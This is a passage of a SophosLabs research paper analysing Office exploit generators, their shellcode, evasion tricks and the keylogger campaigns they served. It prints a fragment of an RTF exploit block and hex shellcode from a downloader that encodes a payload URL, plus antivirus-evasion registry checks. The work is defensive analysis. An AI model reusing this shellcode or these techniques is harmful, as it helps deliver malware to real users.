Office exploit generators

Office exploit generators In this paper, we are going to examine the most prominent Office exploit kits and their impact. Gabor Szappanos, Principal Malware Researcher, SophosLabs Office Exploit Generators Page 1 of 50 Office Exploit Generators Contents Introduction ................................................................................................................................................ 4 Comparison ............................................................................................................................................... 4 MWI ......................................................................................................................................................... 5 Characteristics ................................................................................................................................... 6 Droppers ............................................................................................................................................. 9 Downloaders ...................................................................................................................................... 9 Distributed malware ........................................................................................................................ 10 Example: HawkEye ......................................................................................................................... 10 AK-1 ...................................................................................................................................................... 16 Characteristics ................................................................................................................................. 17 Downloaders .................................................................................................................................... 18 Droppers ........................................................................................................................................... 20 Distributed malware ........................................................................................................................ 20 AK-2 ...................................................................................................................................................... 21 Characteristics ................................................................................................................................. 22 Distributed malware ........................................................................................................................ 23 Example - KeyBase ........................................................................................................................ 24 DL-1 ...................................................................................................................................................... 29 Characteristics ................................................................................................................................. 29 Distributed malware ........................................................................................................................ 33 DL-2 ...................................................................................................................................................... 33 Characteristics ................................................................................................................................. 33 Distributed malware ........................................................................................................................ 36 Example - Neurevt .......................................................................................................................... 37 MNKit .................................................................................................................................................... 40 Characteristics ................................................................................................................................. 41 Distributed malware ........................................................................................................................ 43 Example – Travnet .......................................................................................................................... 43 Tran Duy Linh ...................................................................................................................................... 47 Characteristics ................................................................................................................................. 48 Office Exploit Generators Page 2 of 50 Office Exploit Generators Distributed malware ........................................................................................................................ 50 Conclusion ............................................................................................................................................... 50 Office Exploit Generators Page 3 of 50 Office Exploit Generators Introduction Malware authors have been extensively using document exploits in the past couple of years. Typically exploited documents were attached to email messages and sent out to large numbers of random recipients (in the case of cybercrime groups) or a smaller number of selected targets (in the case of APT groups). Criminals have realized that Microsoft Office documents offer an excellent method of delivering their creations, as users wrongly consider them safe file formats and open them without precaution. As a result document malware has experienced a resurgence, and Office exploit generators have played a crucial role: they made exploitation available for the masses. Despite their significance, most Office exploit kits have not been covered in detail. In this paper, we are going to fill this information gap and examine the most impactful Office exploit kits. The need to develop tools always comes from two primary motivations: extend the availability to groups who have no capability to accomplish the task themselves and to automate tedious manual tasks. The former lead to the appearance of commercial tools, and the latter the development of internal tools. As we will see later in this paper, some of the Office exploit kits are known to be commercial, available for purchase at underground marketplaces. Others we suspect are commercial, but haven’t seen in any of the marketplaces yet. Finally, there are tools that we suspect are internals, available only to a handful of groups. Office Exploit Generators Page 4 of 50 Office Exploit Generators Comparison The following table summarizes the most important characteristics of exploit kits. The meaning of the properties will be explained later in the paper. MWI AK-­‐1 AK-­‐2 DL-­‐1 DL-­‐2 MNKit TLD Kit Downloader ü ü û ü ü û û Dropper ü ü ü û û ü ü Decoy û ü ü û û ü ü Payload Execution WMI ShellExecuteA WinExec WinExec ShellExecuteA WinExec WinExec WinExec Multiple exploits ü ü û û û û û CVE-­‐2010-­‐3333 ü û û û û û û CVE-­‐2012-­‐0158 ü ü û ü ü ü ü CVE-­‐2013-­‐3906 ü û û û û û û CVE-­‐2014-­‐1761 ü ü û û û û û CVE-­‐2015-­‐1641 ü û ü û û û û CVE-­‐2012-­‐0158 is the most commonly supported exploit, despite the patch being available for nearly four years. It comes as no surprise that malware authors have been on the lookout for a suitable replacement. Over the years, there have been a few candidates, such as CVE-­‐2013-­‐3906, CVE-­‐2014-­‐
0761, or the more recently Office exploit: CVE-­‐2015-­‐1641 – which started its lifecycle in APT but found its way into cybercrime back in August 2015. Strangely, less than half of the exploit kits support a decoy document, even though it’s essential for covert operations. Decoys are used to hide malicious activities by providing document content similar to that which the victim would expect to see on opening. The lack of a decoy makes the infection process much more conspicuous. MWI Microsoft Word Intruder has already been thoroughly covered in our previous research paper. It is a well-­‐documented exploit generator with dozens of research reports related to its use in campaigns. Sophos detection: Troj/DocDrop-­‐DM, Troj/20141761-­‐C Office Exploit Generators Page 5 of 50 Office Exploit Generators Characteristics This generator first appeared in May 2013 and soon became popular in the cybercriminal groups. It is a commercial product, available in underground markets. By early 2014 it dominated the charts. Due to a subsequent policy change from the author of the kit, its usage is limited to low volume campaigns. The number of MWI generated samples climaxed in the second half of 2015, where it found an increasing popularity amongst criminal groups. Despite its long history, the popularity of this kit refuses to fade. 50 40 30 20 10 0 MWI makes use of numerous exploits within the same RTF dropper. Each exploit has been added to the kit gradually over the last couple of years. In December 2015, we observed the first attempt to utilize the CVE-­‐2015-­‐1641 vulnerability, but at the time of writing this paper, it is yet to be used aggressively. Office Exploit Generators Page 6 of 50 Office Exploit Generators May 2014:
CVE-2014-1761
June 2013:
CVE-2010-3333
Dec 2015:
CVE-2015-1641
Febr 2014:
CVE-2013-3906
May 2013:
CVE-2012-0158
The document structure of MWI generated samples (at least of the latest ones) is illustrated in the following picture. The most common samples contain three exploits: CVE-­‐2012-­‐0158, CVE-­‐2013-­‐3906, and CVE-­‐2014-­‐1761. Encrypted payload CVE-­‐2012-­‐0158 exploit and egg-­‐
hunting shellcode CVE-­‐2013-­‐3906 exploit and egg-­‐
hunting shellcode CVE-­‐2014-­‐1761 exploit and egg-­‐
hunting shellcode The samples begin with the start marker and the payload (which is stored within the RTF structure as encrypted ASCII data). MWI either embeds the executable payload directly (known as a dropper), or utilizes shellcode to download and run the payload from an embedded URL (known as a downloader). Office Exploit Generators Page 7 of 50 Office Exploit Generators Each exploit block tries to trigger a particular Word vulnerability to run its shellcode. Although the samples house multiple exploits, the accompanying shellcode is essentially identical in its purpose: find and run the next part of the attack. The first chunk of shellcode (first stage) starts with a polymorphic decryptor. The most common variation being a simple one-­‐byte XOR algorithm and additional bytes at even positions are incremented, while bytes at odd positions are decremented. The shellcode that is unscrambled by the decryptor is also a characteristic of MWI: it is what is sometimes referred to as "memory egg-­‐hunting" code. "Egg-­‐hunting" means that the shellcode scans through memory and locates its payload data by looking for a special recognition marker. The code’s first stage uses the IsBadReadPtr based egg-­‐hunting method. This works by locating the second stage in the memory, using 12 consecutive identification bytes (in the following example these are three dwords: 0x79795151, 0x79795151, and 0xd2d29393): The "memory egg-­‐hunting" method makes use of the fact that as Word processes RTF files the parsed content is visible in memory somewhere in the memory pages allocated to Word. Once the recognition marker is found, the shellcode assumes that the data immediately following it is the payload, and decrypts it. This code’s second stage is also encrypted, this time with a one-­‐byte XOR algorithm that leaves null bytes (and consequently the bytes matching the actual key) alone. The key can be constant or modified at each iteration step. Once the second stage is decrypted, it is copied to newly allocated memory and the shellcode transfers execution to it. At this point, a slightly different execution path is followed, depending on whether we are looking at a downloader or a dropper. Office Exploit Generators Page 8 of 50 Office Exploit Generators Droppers The second-­‐stage of dropper samples consists of two parts: more shellcode and a memory block containing the payload sample for delivery. The first-­‐stage shellcode jumps to the second-­‐stage dropper code and writes the malware to disk to run it. The malware ends up at %LOCAL SETTINGS%\ntxobj.exe (or, in more recent MWI versions, in %LOCAL SETTINGS%\Temporary Internet Files\Content.Word\~WRX4014.tmp). The dropped file is executed either by using the CreateProcessA Windows function or by using the WMI COM interface. Using Windows Management Instrumentation for execution is unusual. We have to assume that Microsoft Word Intruder uses this as a trick to try to bypass real-­‐time security products that do not monitor the use of MWI. Downloaders A decrypted downloader works similarly, except that the dropped executable is fetched using the URLDownloadToFileA function, rather than copied from memory. The URL is appended after the shellcode. Office Exploit Generators Page 9 of 50 Office Exploit Generators The payload is downloaded to one of the filenames mentioned for the dropper variants, and executed in the same way as in the dropper case. Distributed malware We have identified about 430 malicious documents generated by MWI, which were used to distribute over 50 malware families (the most common of which are illustrated in the chart below): Zbot 21% Other 27% Zurgop 2% Carberp 13% Buhtrap 6% KeyBase 2% Tinba 2% Dofoil 2% Toshliph 3% Bandok 3% Teamviewer NetWiredRC 3% 4% Andromeda HawkEye 4% 4% Litemanager 4% The list includes common banking Trojans (Zbot, Carberp, Buhtrap), remote admin tools (LiteManager, TeamViewer), password stealers (HawkEye, KeyBase), backdoors (Bandok, NetwiredRC), and in general, most of the high-­‐profile Trojans. Example: HawkEye These campaigns were observed around the end of October 2014 and lasted until the end of July 2015. Since then we have not seen any further activity. The primary infection vector, in this operation, was spear-­‐phishing email messages with an exploited Rich Text Format (RTF) attachment. The email messages used the theme of purchase requests from India to Vietnam, which correlates well with the regional focus of the operation; as we will see later that these two countries were amongst the main targets. Office Exploit Generators Page 10 of 50 Office Exploit Generators After the first Command and Control (C&C) server was shut down, the criminals soon switched to a new server. During this period we observed a different phishing theme, featuring a bank transaction receipt: We have found only a handful of these documents over that time: First seen
13/03/2015
27/05/2015
29/05/2015
08/06/2015
08/06/2015
09/06/2015
11/06/2015
11/06/2015
11/06/2015
12/06/2015
Original name
Vietnam order.doc
Plans and Designs.doc
Invoice.doc
Payment Copy.doc
Label Sample.doc
Original BL
Remodel+plan.doc
Office Exploit Generators SHA1
bec0dbb5bd468da8f92a038d547f8e3e3bfef828
80ac4199c7c519cbbcc04087a684b776cfe2b24a
4aa4e3d70a5af774d95db2a1926fc2c455072f73
8b628278c6b032b26ac5cac84abbdb1ab0777668
2894a0e6bf28e18cf820064dc1ad12d0fee05052
e9e294e6cfaf064373e4600319657f69e2bed278
8afd513d177f99fe4ef95ba5a26c009f9e48b637
b724a030ef3d3ca5aacba76c11bbeb72193f7558
27f59ac9b5796b46bb13cf9dc85bb5e8893a96d5
bbb7e5d092f7e4a56cf0be51d1c586c61f63f44d
Page 11 of 50 Office Exploit Generators 15/06/2015
28/07/2015
28/07/2015
28/07/2015
28/07/2015
Shipping Doc.doc
Payment copy.eml
PO_Vietnam Order.doc
bb33f094b2f9c940b25518efcb9eb1dc38612be8
9aa2372ebaac689c503a07a693a305aa845539b2
05468cb85b2ef4f63ffc2256414eb984315e7600
c17f283852e9054c5a99fab2ced81dcdb7717ae0
5cc410e31e5e84e980039e99cae47cbabae85a5c
The original names of the attachments suggest that most distribution campaigns used one of the two previously mentioned themes (shipping label or payment receipt). All of these exploited document samples were downloaders that installed the HawkEye password stealer program. When the attached document was opened, the payload was downloaded and executed; this installed the HawkEye keylogger that immediately started to gather user credentials. Hawkeye is a commercial keylogger tool available from http://hawkeyeproducts.com/ that logs keystrokes, clipboard content, and can gather all passwords. HawkEye seems to be a popular choice in crimeware operations; recent but unrelated encounters were documented in reports by Trend Micro and iSight researchers. The product supports email or web uploads of stolen information, but in this operation the FTP method was often favored. We named the individual campaigns after the unique FTP user names used in the upload. Office Exploit Generators Page 12 of 50 Office Exploit Generators The stolen information is uploaded to the server in regular intervals; the captured files are plaintext with content similar to this one: During the time of this operation the following servers were used as MWISTAT C&C servers: six-bro[.]com
amittrade[.]com
six-­‐bro[.]com was the most actively used, with our data indicating that operations related to this server went on from mid-­‐March and finished around the end of June when the server was shut down. The six-­‐bro[.]com domain itself was shut down the middle of July 2015 and was not a hacked domain; it was registered and maintained by the criminals. After this date, the operation transferred to the second maintained C&C domain amittrade[.]com where it ran until the end of July. The last sample related to this operation we observed on 28 July 2015. The number of victims in the campaigns ranged widely between a few dozen to a few hundred. This is a relatively low number when compared to the number of ransomware or Zbot victims, but as stated in the terms and conditions of MWI they do not permit large campaigns. Nevertheless, it is a solid income for the criminals. The criminals performed at least nine separate campaigns – all targeting small and medium businesses, predominantly in Asia. It is interesting to note that the majority of the attacks were targeting a specific industrial sector. For example, the largest campaign targeted leather manufacturing companies and their supply chain: •
•
•
•
•
•
Leather manufacturers Raw leather materials Leather processing chemicals Foreign trade companies Logistics Packaging Office Exploit Generators Page 13 of 50 Office Exploit Generators This campaign (using the codename collins, after the unique FTP upload ID) focused on Asia and Africa, with the most affected countries being Indonesia, India, Thailand and Ethiopia. Indonesia: 41%
India: 19%
Thailand: 6%
Ethiopia: 5%
Malaysia: 3%
China: 3%
Vietnam: 4%
CN 3% VN 3% Other 20% ID 41% MY 3% IN 19% ET 5% TH 6% Another large campaign (running under the name victor) went after pharmaceutical companies and their suppliers: •
•
Chemicals, medicines Pharmaceutical raw materials Office Exploit Generators Page 14 of 50 Office Exploit Generators •
•
•
Clinical research Logistics Packaging The second largest campaign (victor) focused on Asia and Africa, with the most affected countries being India, Vietnam and Indonesia. India: 68%
Vietnam: 23%
Indonesia: 3%
KE ID DE 1% 3% 1% CN 1% NG RS UG 1% 1% 1% VN 23% IN 68% Office Exploit Generators Page 15 of 50 Office Exploit Generators During each campaign we observed several infection waves, where a large number of recipients (typically 500-­‐700) were targeted with phishing emails where the content was similar to this mail, taken from the targeted leather manufacturers campaign (addresses were typically taken from Alibaba search. They used the stolen credentials to login to corporate mail and then search through the Sent Mails folder for recent messages containing keywords like invoice. If they found such a message, they sent a reply asking the recipient to send the money to a separate bank account belonging to the criminals. We can estimate the success of the criminals based on our raw data. In the first campaign they sent out about five waves of phishing messages with the malicious Word document; each campaign had about 500 targets. The infection stats show that this resulted in around 80-­‐150 infected computers per campaign. In the case of the first campaign, we observed at least six instances of invoice hijacking messages. Typically they go for invoices for large amounts of money ranging between 200,000 USD and 900,000 USD. We can’t know the success rate of the hijacks, but as a worst case scenario if only one of them succeeds (which is a reasonable assumption, given they continued the operation for months), then they should make about 300,000 USD per campaign. Running eight campaigns over the examined period, we can estimate their gain to be in the range of 2 million USD, which is a decent profit. AK-­‐1 We are not aware of any public reports relating to this exploit kit, thus, we have no official name for it, but AK-­‐1 is very likely a commercial product distributed in underground marketplaces. We have yet to see any advertising for it though. The first sample we think we saw generated by this kit was: SHA1: 287545adf2a83af5bb3858f0f476d4fdf4e21304
Office Exploit Generators Page 16 of 50 Office Exploit Generators Original name: Secret meeting.doc
First seen: 2015-01-29 17:37:45 UTC
Sophos detection: Troj/20141761-­‐F The samples generated by this kit show the following distribution: 120 100 80 60 40 20 0 The use of AK-­‐1 was most active between mid to late 2015. However, the emergence of its successor AK-­‐2 is likely to spell the end of the kit’s lifespan. Characteristics The document structure of the AK-­‐1 generated samples (at least of the latest ones) is illustrated in the following picture. CVE-­‐2012-­‐0158 exploit and first stage shellcode CVE-­‐2014-­‐1761 exploit and first stage shellcode Second stage shellcode and encrypted payload AK-­‐1 generates RTF documents that usually contain two exploits, CVE-­‐2012-­‐0158 and CVE-­‐2014-­‐1761. There are only a handful of exceptions where the second exploit is missing, like the sample with SHA1: 836109e392d14af113bf14aa70bcb3d660f80640 from the m_project report by Quickheal. The malicious documents begin with the exploit blocks, with the payload stored at the end of the documents as appended binary data. Just like the MWI samples we saw earlier, the samples either Office Exploit Generators Page 17 of 50 Office Exploit Generators embed the executable payload directly or use shellcode to download and run the payload from an embedded URL. Each of the exploit blocks tries to trigger a particular Word vulnerability to run its shellcode. Again each exploit includes its own shellcode but they are essentially the same: they find and run the second stage shellcode. The CVE-­‐2014-­‐1761 block has two additional NOP-­‐loaded leveltext structures. This block has no function at all, not needed in the exploitation process, but serves as a good indicator for AK-­‐1 generated documents. \levelspace22873{\*\levelindent23130}
{\leveltext\'ff\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831 ?\u-48831
(-­‐48831 is stored as 0x4141, these values fill the leveltext structures with the character ‘A’) The shellcode starts by enumerating the open files handles to find the carrier RTF file that contains the second stage of shellcode. It identifies the start of the shellcode by a 20 bytes signature. 12 of these bytes are string markers, the remaining 8 bytes are the start of the second stage shellcode. If the first two marker strings don’t match, it keeps looking for further files. If they do match, but further checks fail, the execution aborts to a hardcoded memory address. This is usually within the resource section of msores.dll which is not executable, causing Word to crash. Downloaders The downloader shellcode is in the appended binary data. The shellcode is a simple downloader, with a couple of redirection layers intended to complicate analysis. Office Exploit Generators Page 18 of 50 Office Exploit Generators The shellcode performs a couple of AV evasion steps: firstly checking the Process Environment Block to see if the process is being debugged. If this is the case, the execution takes an alternate route, where a different payload is downloaded. Assuming the code isn’t being debugged the shellcode proceeds to checksum itself to ensure it has not been altered. If the shellcode has been modified, it proceeds to abort the execution. The same happens if anything other than the winword.exe process runs the shellcode. These countermeasures aim to avoid reverse engineering of the code. The carrier document is recognized by a series of sanity checks. The shellcode searches for byte sequences from all of its main constituents: •
•
•
‘a401FfE0’ in the CVE-­‐2012-­‐0158 exploit block ‘ecount25’ in the CVE-­‐2014-­‐1761 block ‘6%m*<;+`’, 0x2057e854 and ‘ )/=j0|.!’ In different parts of the shellcode This self-­‐check is redundant, as the carrier document has already located the first stage shellcode and there is no need to do it again. Once the shellcode has done as much as it can to avoid reversing, it checks if Kaspersky Antivirus is installed. It checks to see if the office_antivirus.dll library is loaded and if it is, takes a different execution path, and the real payload is not downloaded. This alternative path is also taken if any of the following registry keys is detected: SOFTWARE\KasperskyLab\protected\avp11\Data
SOFTWARE\KasperskyLab\protected\AVP12\Data
SOFTWARE\KasperskyLab\protected\AVP13\Data
SOFTWARE\KasperskyLab\protected\AVP14.0.0\Data
SOFTWARE\KasperskyLab\AVP15.0.0\Data
SOFTWARE\KasperskyLab\AVP15.0.1\Data
SOFTWARE\KasperskyLab\AVP15.0.2\Data
Both the normal and alternative code flows download and execute a program from a hardcoded URL. The only difference is the URL itself. This feature was likely intended to provide different, even innocent Office Exploit Generators Page 19 of 50 Office Exploit Generators content, when an antivirus solution is installed. Unfortunately, we have not been able to analyze the alternative URLs as the analyzed samples all contained random bytes for the download URL. Droppers The first droppers samples appeared somewhat later (around the end of April 2015), and they essentially have the same code avoiding Kaspersky Antivirus. After it finds itself in the memory (using the same markers as the downloader variation), it searches for the starter marker (0xBABABABA) and end marker (0xBBBBBBBB) before decrypting the data in between (using a 4 byte XOR key 0xCAFEBABE, preserving null values). On a successful decrypt, it saves the payload to disk and executes it. Unlike MWI, decoys are supported by AK-­‐1, so the next thing the shellcode does is decrypts the decoy document content using the same algorithm as before but with different start/end markers (0xBBBBBBBB and 0xBCBCBCBC) and encryption key (0xBAADF00D). When decrypting is finished, the decoy is displayed in Word. The decoy document is not persistent; the content will be lost after closing Word. In some of the dropper samples (e.g. the document with SHA-­‐1: 1a90d16f1278123e50706b456cef3a62bebe369f) the KAV-­‐aware code is absent. We guess that the inclusion of this code could be a configurable option. Distributed malware We have identified about 600 malicious documents generated by AK-­‐1, which were used to distribute over 35 malware families. The most frequent are illustrated in this chart: Office Exploit Generators Page 20 of 50 Office Exploit Generators Fynloski 1% Wonton 3% Neurevt Xtrat Nagoot 1% 1% PredatorPain 27% Other 11% 4% Spyrat 6% Zbot 9% Fareit 7% Chisburg 22% NetWiredRC 8% In its heyday the most popular Trojans (Zbot, Chisburg, Fareit, Neurevt) were favored but with the appearance of the AK-­‐2 these variants have slowed down somewhat. It appears a few diehard groups are still using the older version of the kit, but they are mostly deploying the PredatorPain keylogger and the NetWiredRC backdoor. We have not seen user reports of documents generated by AK-­‐1 for the last two months. AK-­‐2 We wrote about the characteristics of this kit back in September last year in a research paper we published on our security blog Naked Security. Like its predecessor we are not aware of other public reports related to this exploit kit, thus, we have no official name for it. This kit only appeared recently, but its usage is picking up, as shown in the chart below. 60 50 40 30 20 10 0 Aug-­‐15 Sep-­‐15 Oct-­‐15 Nov-­‐15 Dec-­‐15 Jan-­‐16 Feb-­‐16 Sophos detection: Troj/DocDrop-­‐FK Office Exploit Generators Page 21 of 50 Office Exploit Generators Characteristics There are many characteristics that connect this generator to AK-­‐1: the shellcode is essentially identical including the encryption algorithm and encryption keys. The marker bytes indicating the beginning of the second stage shellcode are changed, however, to 0xFEFEFEFE and 0xFFFFFFFF (illustrated in the following code fragment): This new revision of the kit seems to have dropped support for the older exploits and also removed the Kaspersky-­‐aware code (as a result, the length of the shellcode is about half that of AK-­‐1 droppers). The overall document structure is illustrated on the following scheme: Office Exploit Generators Page 22 of 50 Office Exploit Generators Object 1: otkloadr.WRAssembly loader Object 2: CVE-­‐2012-­‐1856 heap spray and first stage shellcode Object 3: CVE-­‐2015-­‐1641 exploit trigger Object 4: CVE-­‐2015-­‐1770 exploit trigger Second stage shellcode and encrypted payload The infected droppers are RTF documents that contain four embedded objects, each play some role in the exploitation. Possible exploitation workflow: •
•
•
•
Object 1 makes sure that msvc71.dll is loaded Object 2 sprays the heap and contains the first stage shellcode. Object 3 triggers the vulnerability Object 4 would play the same role as Object 3, with a different vulnerability; however it doesn’t seem to do anything The first sample started to appear at the beginning of August 2015 and is currently one of the most actively used exploit generators. Distributed malware Since this kit is a new development, it is only used by a few groups (but they use it extensively). This likely explains why there are only 15 malware families currently being deployed using them and why the number of samples are so low (only 350 malicious documents that we identified as created by this kit). The most frequent of them are displayed in the following chart: Office Exploit Generators Page 23 of 50 Office Exploit Generators NetWiredRC 3% Nagoot 3% Toshliph 4% KeyBase 13% Nanocore HawkEye 2% 3% Other 6% Zbot 28% Neurevt 16% Fareit 22% The most commonly distributed Trojans are Zbot, Neurevt/Betabot, Toshliph (Carberp related downloader), and Fareit/Ponyloader. A commercial keylogger, KeyBase was also one of the more favored choices. Example -­‐ KeyBase As an example, we took a document that was circulated just before Christmas in 2015: SHA1: 4d5b471e778c105374e2036815ad41e6398321c6
Original name: P#21122015.doc
First seen: 20/12/2015
Upon opening, the exploited document dropped the payload into the user’s home directory, into \AppData\Roaming\winsvchost.exe, executed it and displayed decoy content to hide the malicious activities: Office Exploit Generators Page 24 of 50 Office Exploit Generators The payload was the KeyBase keylogger, which dumped the stolen credentials to the C&C site www.ozowarac[.]com. Based on the VirusTotal data this site has been actively used to distribute malware and host C&C services: 11/66 2016-01-24 17:45:50 hxxp://www.ozowarac[.]com/me/config.bin
9/66 2016-01-19 23:27:37 hxxp://www.ozowarac[.]com/ff/config.bib
10/66 2016-01-14 19:28:18 hxxp://www.ozowarac[.]com/P_O/Purchase_Order.zip
10/66 2016-01-03 16:27:37 hxxp://www.ozowarac[.]com/me/gate.php
8/66 2016-01-01 16:34:50 hxxp://www.ozowarac[.]com/kb/keybase/image/upload.php
7/66 2015-12-28 09:11:01 hxxp://www.ozowarac[.]com/ff/config.bin
9/66 2015-12-27 07:25:39 hxxp://www.ozowarac[.]com/yahoo.htm
5/66 2015-12-27 00:15:46 hxxp://www.ozowarac[.]com/_/urchase_rder.zip
7/66 2015-12-26 23:48:09 hxxp://www.ozowarac[.]com/kb/keybase/login.php
4/66 2015-12-23 08:04:25 hxxp://www.ozowarac[.]com/Purchase_Order/purchase_order.zip
5/65 2015-10-08 06:27:44 hxxp://www.ozowarac[.]com/zenit.php
4/63 2015-08-01 10:24:36 hxxp://www.ozowarac[.]com/upgrade/newp
4/63 2015-07-10 11:28:31 hxxp://www.ozowarac[.]com/ali/newp
4/63 2015-06-10 06:40:08 hxxp://www.ozowarac[.]com/Quotation.Pdf.exe
The items highlighted in yellow are direct malware downloads. The green items are KeyBase C&C components based on the file names, and the red items are Zbot/Zeus C&C components. KeyBase is a trending payload in several malware groups nowadays. In fact, we have seen evidence that all of the cybercrime Office exploit kits (MWI, AK-­‐1, AK-­‐2, DL-­‐1, DL-­‐2) were used to distribute this Trojan. The original homepage of the product was http://www.keybase.in/ However, the project has been shut down due to its increased use by criminals: Office Exploit Generators Page 25 of 50 Office Exploit Generators This hasn’t stopped the criminals from using the keylogger in their campaigns, though. The web archive stores earlier states of the site, giving us a hint about the capabilities of the tool; see here: https://web.archive.org/web/20150623002553/http://www.keybase.in/ Along with stealing the credentials from all popular web browsers and email clients, KeyBase is capable of storing keystrokes and clipboard content, and screenshots can also be created with it. Office Exploit Generators Page 26 of 50 Office Exploit Generators The stolen data is uploaded to the criminal’s website, where a user-­‐friendly interface is available, including login page: A successful login leads to a dashboard which summarizes the available information collected from the infected victims: From here it is possible to access the uploaded clipboard content: Office Exploit Generators Page 27 of 50 Office Exploit Generators The stolen passwords: Or browse the screenshots: The target distribution of a typical KeyBase campaign is illustrated in the following picture. The main targets were in Asia, India, Indonesia, Bangladesh and Djibouti. Office Exploit Generators Page 28 of 50 Office Exploit Generators We have no direct information about how the stolen data was used, however, given that KeyBase is frequently distributed in campaigns with traditional banking Trojans (Zbot, Dofoil), sharing the C&C infrastructure with them, we would guess that the criminals were after banking information. DL-­‐1 We are not aware of public reports related to this exploit kit, thus, we have no official name for it either. Sophos detection: Troj/DocDrop-­‐DT The first sample that we think was generated by this kit was the following: SHA1: 27407bf7d4d34a0108390c19ffd3f1ae043e589c
Original name: SEQ-0009- ForYousuf Al Kafood.doc
First seen: 2015-01-30 09:33:41 UTC
The most active use of this kit was in February-­‐March 2015. Since then its prevalence has decreased, but new samples keep popping up. 40 35 30 25 20 15 10 5 0 The distributed malware was a narrow selection of the landscape. It suggests that this kit is not in wide circulation, probably not even a commercial tool and only available to a few cybercrime groups. However, these groups used the documents generated by this kit in large scale distribution campaigns. So even though it is used by a small number of criminal groups, these campaigns affected a large number of users – more than MWI, AK-­‐1 or AK-­‐2. Characteristics The documents created by DL-­‐1 are RTF files but differ from other kits in that all variants are downloaders. They vary widely in size, from about 50KB up to 12MB, but are consistent in that they all exploit CVE-­‐2012-­‐0158. The vulnerability triggers a simple downloader shellcode that connects back to a server to download and execute the payload. Office Exploit Generators Page 29 of 50 Office Exploit Generators The kit generates RTF documents, with the following structure: RTF head and filler junk Embedded fake objects CVE-­‐2012-­‐0158 block Trailing junk Both the beginning and the end of the documents are filled with large blocks of innocent content. This is likely targeted at antivirus scanners that do not scan the entire contents of RTF files, only looking at the beginning and the end of the file. The documents start with RTF header followed by some junk content. This junk content can be unused RTF metadata: {\rtf1{}{}\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhic
h31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\f
bidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi
\froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}
{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi
\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\flomajor\f31500\fbidi
\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}
{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}
Or in other cases the junk content is a huge block of line feeds: Or a block of non-­‐ASCII characters: Office Exploit Generators Page 30 of 50 Office Exploit Generators This is followed by one or more embedded objects. These objects have no purpose other than fooling the researchers and masking the malicious code. In some cases embedded objects included embedded pictures, like this lovely estate: Or some garbled picture: Or an advertisement of a (no longer active) hacker site: Office Exploit Generators Page 31 of 50 Office Exploit Generators The embedded objects are followed by the real malicious content, the CVE-­‐2012-­‐0158 exploit block with a downloader shellcode. This exploit block is heavily obfuscated, in order to bypass antivirus scanners. In addition, the shellcode is broken into pieces, with large chunks of line feeds inserted between the pieces: 5668800000008b4704e8fefeffff578d1c068b775c89dfa4807fff0075f95f31c95151ff7760ff77
{skip several thousand linefeeds}
58518b470ce8dafeffff31c9515151ff776051518b4710e8c8feffff31c0508b4708e8bdfeffff
{skip several thousand linefeeds}
485454503a2f2f7361676c696b706f7274616c692e6e65742f63616d6f2f73796e632f6872797074364539344234302e6578
650000000000000000000000000000000000000000000000
The shellcode itself is a simple downloader, calling URLDownloadToFileA to download the payload, saving the result into the %TEMP% directory, and running it using ShellExecuteA. The imported Windows API function names are not stored within the code, only the checksum values pre-­‐calculated from their names: The exploited documents end with a large block of ‘0’characters, once again to fill it with innocent content. 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
}}}}
Due to the large size of the inserted junk content the final file size can end up being several megabytes. Office Exploit Generators Page 32 of 50 Office Exploit Generators Distributed malware The malware delivered by these documents shows a very unbalanced distribution, dominated by Zbot and overall only about ten families were directly related to DL-­‐1. This could be an indication that this tool is used only by very few groups – it could even be an internal tool only available to some groups. Even the number of generated documents (about 100) is lower than other generators. Andromeda HawkEye Lazagne Bladabindi 5% 3% 3% 3% Chisburg 5% Zbot 38% KeyBase 3% Neurevt 8% DarkComet 8% Fareit 11% Autoit 13% DL-­‐2 We are not aware of public reports related to this exploit kit, thus, we have no official name for it either. Sophos detection: Troj/DocDrop-­‐DT Characteristics The samples generated by this kit are very similar to those produced by DL-­‐1 i.e. all of them RTF files and downloaders. In fact, the close similarity in the characteristics suggests that DL-­‐1 and DL-­‐2 might not be separate tools; rather, different versions of the same kit. It is even possible that we are talking about a single tool with different configuration options. The same applies to the campaigns for DL-­‐1: even though it is used by a small number of criminal groups, these campaigns affect a large number of users. The first sample we think generated by this kit was the following: SHA1: f4313a3534d3343df384431b3991bd762dc4bf41
Original name: PT9709400.doc
First seen: 2015-07-15 09:29:46 UTC
